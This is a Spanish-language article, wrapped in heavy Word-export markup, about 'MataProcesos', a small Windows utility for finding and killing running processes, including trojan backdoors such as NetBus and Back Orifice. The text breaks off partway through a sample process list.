&lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="19" semihidden="false" unhidewhenused="false" qformat="true" name="Subtle Emphasis"&gt;   &lt;w:lsdexception locked="false" priority="21" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Emphasis"&gt;   &lt;w:lsdexception locked="false" priority="31" semihidden="false" unhidewhenused="false" qformat="true" name="Subtle Reference"&gt;   &lt;w:lsdexception locked="false" priority="32" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Reference"&gt;   &lt;w:lsdexception locked="false" priority="33" semihidden="false" unhidewhenused="false" qformat="true" name="Book Title"&gt;   &lt;w:lsdexception locked="false" priority="37" name="Bibliography"&gt;   &lt;w:lsdexception locked="false" priority="39" qformat="true" name="TOC Heading"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Font Definitions */  @font-face 	{font-family:"Cambria Math"; 	panose-1:2 4 5 3 5 4 6 3 2 4; 	mso-font-charset:1; 	mso-generic-font-family:roman; 	mso-font-format:other; 	mso-font-pitch:variable; 	mso-font-signature:0 0 0 0 0 0;}  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-parent:""; 	margin:0cm; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman","serif"; 	mso-fareast-font-family:"Times New Roman";} p 	{mso-style-noshow:yes; 	mso-style-unhide:no; 	mso-margin-top-alt:auto; 	margin-right:0cm; 	mso-margin-bottom-alt:auto; 	margin-left:0cm; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman","serif"; 	mso-fareast-font-family:"Times New Roman";} .MsoChpDefault 	{mso-style-type:export-only; 	mso-default-props:yes; 	font-size:10.0pt; 	mso-ansi-font-size:10.0pt; 	mso-bidi-font-size:10.0pt;} @page Section1 	{size:612.0pt 792.0pt; 	margin:70.85pt 3.0cm 70.85pt 3.0cm; 	mso-header-margin:36.0pt; 	mso-footer-margin:36.0pt; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Tabla normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-priority:99; 	mso-style-qformat:yes; 	mso-style-parent:""; 	mso-padding-alt:0cm 5.4pt 0cm 5.4pt; 	mso-para-margin:0cm; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:"Times New Roman"; 	mso-fareast-theme-font:minor-fareast; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;/p&gt;&lt;p&gt;&lt;span style="font-size: 10pt; font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;;"&gt;Este pequeño programa, (hecho cuando comenzó el furor del Back Orifice) se llama "MataProcesos" y es una pequeña utilidad que cumple la función que debería estar incluída en la ventana de CTRL-ALT-DEL. Curiosamente esta utilidad tan "pequeña" (ocupa 40 Kb y cumple una tarea muy sencilla) nos será de enorme ayuda con el tema de la seguridad.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;;"&gt;Cuando uno ejecuta el MataProcesos un icono (una señal de STOP) se coloca en la barra de tareas. si queremos cerrar un programa rapidamente (alguno que se colgó, o de esos que no aparecen en el CTR-ALT-DEL, como por ejemplo UN BACKDOOR como el patch del NetBus, si es que algun "vivo" nos lo metió) haremos doble click en el STOP y se abrirá una ventana con un listado de todos los procesos reales que se están ejecutando en el momento, listados por nombre de archivo ejecutable.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;;"&gt;Para cerrar (matar) un proceso, basta con hacer doble click en el item de la lista que lo representa, y responder que SI a la pregunta que MataProcesos nos hace cuando pide la confirmación.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;;"&gt;Notemos que dije que con MataProcesos podemos matar a "todos los procesos", lo cual incluye también a los procesos vitales del Windows, por lo que la primera vez, por falta de experiencia, podriamos "matar" al Windows mismo, obligándonos a reiniciar el ordenador.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;;"&gt;Este programa es útil, por ejemplo, si estamos siendo víctima de un troyano, es decir, alguien nos está "molestando", mostrando mensajes extraños en nuestra pantalla sin nuestra autorización, mostrandonos imágenes y abriendo y cerrando la bandeja de nuestro CD-ROM...&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;b&gt;&lt;span style="font-size: 10pt; font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;; color: rgb(51, 153, 0);"&gt;&lt;br /&gt;Usando el MataProcesos para sacarnos de un apuro &lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;;"&gt;En ese caso, estamos frente a un auténtico "Lamer" (que vendría a ser algo así como un tonto que quiere ser Hacker y utiliza programas como el NetBus, Back Orifice, Sub Seven, Donald Dick o NetSphere para asustar o abusarse de los que no saben). ¿Cómo llegó hasta aquí este individuo? El, u otro similar a él, nos pasó un archivo EXE o SCR haciendonos creer que se trataba de algo muy interesante, y cuando (incautos) lo ejecutamos... probablemente no pasó nada, o algo no muy interesante que digamos... Pero en realidad lo que ocurrió fué que acabamos de instalar un "control remoto" para que este "Lamer" pueda controlar nuestro sistema a su antojo. Fuimos vilmente engañados. Ejecutamos, sin saberlo, un troyano.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;;"&gt;Tenemos que apurarnos a quitarnoslo de encima, porque por el momento también tiene acceso a nuestros archivos, para robarlos o borrarlos.&lt;/span&gt;&lt;/p&gt;  &lt;span style="font-size: 10pt; font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;;"&gt;El modo de usar el MataProcesos en este caso sería simplemente seleccionar el proceso adecuado (el del troyano) y terminarlo.&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 12"&gt;&lt;meta name="Originator" content="Microsoft Word 12"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Candres%5CCONFIG%7E1%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_filelist.xml"&gt;&lt;link rel="themeData" href="file:///C:%5CDOCUME%7E1%5Candres%5CCONFIG%7E1%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_themedata.thmx"&gt;&lt;link rel="colorSchemeMapping" href="file:///C:%5CDOCUME%7E1%5Candres%5CCONFIG%7E1%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_colorschememapping.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:trackmoves/&gt;   &lt;w:trackformatting/&gt;   &lt;w:hyphenationzone&gt;21&lt;/w:HyphenationZone&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:donotpromoteqf/&gt;   &lt;w:lidthemeother&gt;ES&lt;/w:LidThemeOther&gt;   &lt;w:lidthemeasian&gt;X-NONE&lt;/w:LidThemeAsian&gt;   &lt;w:lidthemecomplexscript&gt;X-NONE&lt;/w:LidThemeComplexScript&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;    &lt;w:splitpgbreakandparamark/&gt;    &lt;w:dontvertaligncellwithsp/&gt;    &lt;w:dontbreakconstrainedforcedtables/&gt;    &lt;w:dontvertalignintxbx/&gt;    &lt;w:word11kerningpairs/&gt;    &lt;w:cachedcolbalance/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;   &lt;m:mathpr&gt;    &lt;m:mathfont val="Cambria Math"&gt;    &lt;m:brkbin val="before"&gt;    &lt;m:brkbinsub val="--"&gt;    &lt;m:smallfrac val="off"&gt;    &lt;m:dispdef/&gt;    &lt;m:lmargin val="0"&gt;    &lt;m:rmargin val="0"&gt;    &lt;m:defjc val="centerGroup"&gt;    &lt;m:wrapindent val="1440"&gt;    &lt;m:intlim val="subSup"&gt;    &lt;m:narylim val="undOvr"&gt;   &lt;/m:mathPr&gt;&lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" defunhidewhenused="true" defsemihidden="true" defqformat="false" defpriority="99" latentstylecount="267"&gt;   &lt;w:lsdexception locked="false" priority="0" semihidden="false" unhidewhenused="false" qformat="true" name="Normal"&gt;   &lt;w:lsdexception locked="false" priority="9" semihidden="false" unhidewhenused="false" qformat="true" name="heading 1"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 2"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 3"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 4"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 5"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 6"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 7"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 8"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 9"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 1"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 2"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 3"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 4"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 5"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 6"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 7"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 8"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 9"&gt;   &lt;w:lsdexception locked="false" priority="35" qformat="true" name="caption"&gt;   &lt;w:lsdexception locked="false" priority="10" semihidden="false" unhidewhenused="false" qformat="true" name="Title"&gt;   &lt;w:lsdexception locked="false" priority="1" name="Default Paragraph Font"&gt;   &lt;w:lsdexception locked="false" priority="11" semihidden="false" unhidewhenused="false" qformat="true" name="Subtitle"&gt;   &lt;w:lsdexception locked="false" priority="0" name="Hyperlink"&gt;   &lt;w:lsdexception locked="false" priority="22" semihidden="false" unhidewhenused="false" qformat="true" name="Strong"&gt;   &lt;w:lsdexception locked="false" priority="20" semihidden="false" unhidewhenused="false" qformat="true" name="Emphasis"&gt;   &lt;w:lsdexception locked="false" priority="0" name="Normal (Web)"&gt;   &lt;w:lsdexception locked="false" priority="59" semihidden="false" unhidewhenused="false" name="Table Grid"&gt;   &lt;w:lsdexception locked="false" unhidewhenused="false" name="Placeholder Text"&gt;   &lt;w:lsdexception locked="false" priority="1" semihidden="false" unhidewhenused="false" qformat="true" name="No Spacing"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 1"&gt;   &lt;w:lsdexception locked="false" unhidewhenused="false" name="Revision"&gt;   &lt;w:lsdexception locked="false" priority="34" semihidden="false" unhidewhenused="false" qformat="true" name="List Paragraph"&gt;   &lt;w:lsdexception locked="false" priority="29" semihidden="false" unhidewhenused="false" qformat="true" name="Quote"&gt;   &lt;w:lsdexception locked="false" priority="30" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Quote"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="19" semihidden="false" unhidewhenused="false" qformat="true" name="Subtle Emphasis"&gt;   &lt;w:lsdexception locked="false" priority="21" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Emphasis"&gt;   &lt;w:lsdexception locked="false" priority="31" semihidden="false" unhidewhenused="false" qformat="true" name="Subtle Reference"&gt;   &lt;w:lsdexception locked="false" priority="32" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Reference"&gt;   &lt;w:lsdexception locked="false" priority="33" semihidden="false" unhidewhenused="false" qformat="true" name="Book Title"&gt;   &lt;w:lsdexception locked="false" priority="37" name="Bibliography"&gt;   &lt;w:lsdexception locked="false" priority="39" qformat="true" name="TOC Heading"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Font Definitions */  @font-face 	{font-family:"Cambria Math"; 	panose-1:2 4 5 3 5 4 6 3 2 4; 	mso-font-charset:1; 	mso-generic-font-family:roman; 	mso-font-format:other; 	mso-font-pitch:variable; 	mso-font-signature:0 0 0 0 0 0;}  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-parent:""; 	margin:0cm; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman","serif"; 	mso-fareast-font-family:"Times New Roman";} p 	{mso-style-noshow:yes; 	mso-style-unhide:no; 	mso-margin-top-alt:auto; 	margin-right:0cm; 	mso-margin-bottom-alt:auto; 	margin-left:0cm; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman","serif"; 	mso-fareast-font-family:"Times New Roman";} .MsoChpDefault 	{mso-style-type:export-only; 	mso-default-props:yes; 	font-size:10.0pt; 	mso-ansi-font-size:10.0pt; 	mso-bidi-font-size:10.0pt;} @page Section1 	{size:612.0pt 792.0pt; 	margin:70.85pt 3.0cm 70.85pt 3.0cm; 	mso-header-margin:36.0pt; 	mso-footer-margin:36.0pt; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Tabla normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-priority:99; 	mso-style-qformat:yes; 	mso-style-parent:""; 	mso-padding-alt:0cm 5.4pt 0cm 5.4pt; 	mso-para-margin:0cm; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:"Times New Roman"; 	mso-fareast-theme-font:minor-fareast; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;/p&gt;&lt;p&gt;&lt;span style="font-size: 10pt; font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;;"&gt;Cómo reconocemos al troyano? Bueno, suponiendo que la lista que MataProcesos nos muestra es la siguiente:&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;; color: rgb(0, 102, 153);"&gt;C:\WINDOWS\SYSTEM\KERNEL32.DLL&lt;br /&gt;C:\WINDOWS\SYSTEM\MSGSVR32.EXE&lt;br 